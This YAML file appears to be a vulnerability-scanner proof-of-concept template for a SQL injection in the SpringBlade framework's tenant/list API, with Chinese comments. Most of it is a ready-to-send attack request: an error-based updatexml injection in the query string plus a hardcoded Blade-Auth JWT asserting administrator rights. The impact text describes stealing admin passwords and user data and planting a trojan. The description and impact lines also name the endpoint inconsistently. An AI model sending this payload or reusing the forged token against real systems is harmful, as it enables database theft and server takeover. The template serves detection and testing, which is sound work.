33 lines
1.8 KiB
YAML
33 lines
1.8 KiB
YAML
|
keyword: SpringBlade
|
|||
|
|
name: SpringBlade_SQL注入漏洞
|
|||
|
|
description: |
|
|||
|
|
SpringBlade系统menu接口存在SQL注入漏洞
|
|||
|
|
requests: # 为空代表默认或者不启用
|
|||
|
|
path: "/api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1"
|
|||
|
|
method: GET
|
|||
|
|
headers:
|
|||
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
|
|||
|
|
Content-Length:
|
|||
|
|
Accept:
|
|||
|
|
Content-Type:
|
|||
|
|
Accept-Encoding:
|
|||
|
|
Cookie:
|
|||
|
|
Referer:
|
|||
|
|
X-Forwarded-For:
|
|||
|
|
Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ
|
|||
|
|
body-raw: |-
|
|||
|
|
|
|||
|
|
response:
|
|||
|
|
path: "" # 不填则默认接收此请求的响应包
|
|||
|
|
status-code: 500
|
|||
|
|
body: "database" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
|
|||
|
|
time: # 此处填写响应包响应时间,默认不启用
|
|||
|
|
headers:
|
|||
|
|
Server:
|
|||
|
|
Content-type:
|
|||
|
|
Content-length:
|
|||
|
|
Date:
|
|||
|
|
Connection:
|
|||
|
|
impact: |
|
|||
|
|
SpringBlade 后台框架 /api/blade-system/tenantist路径存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
|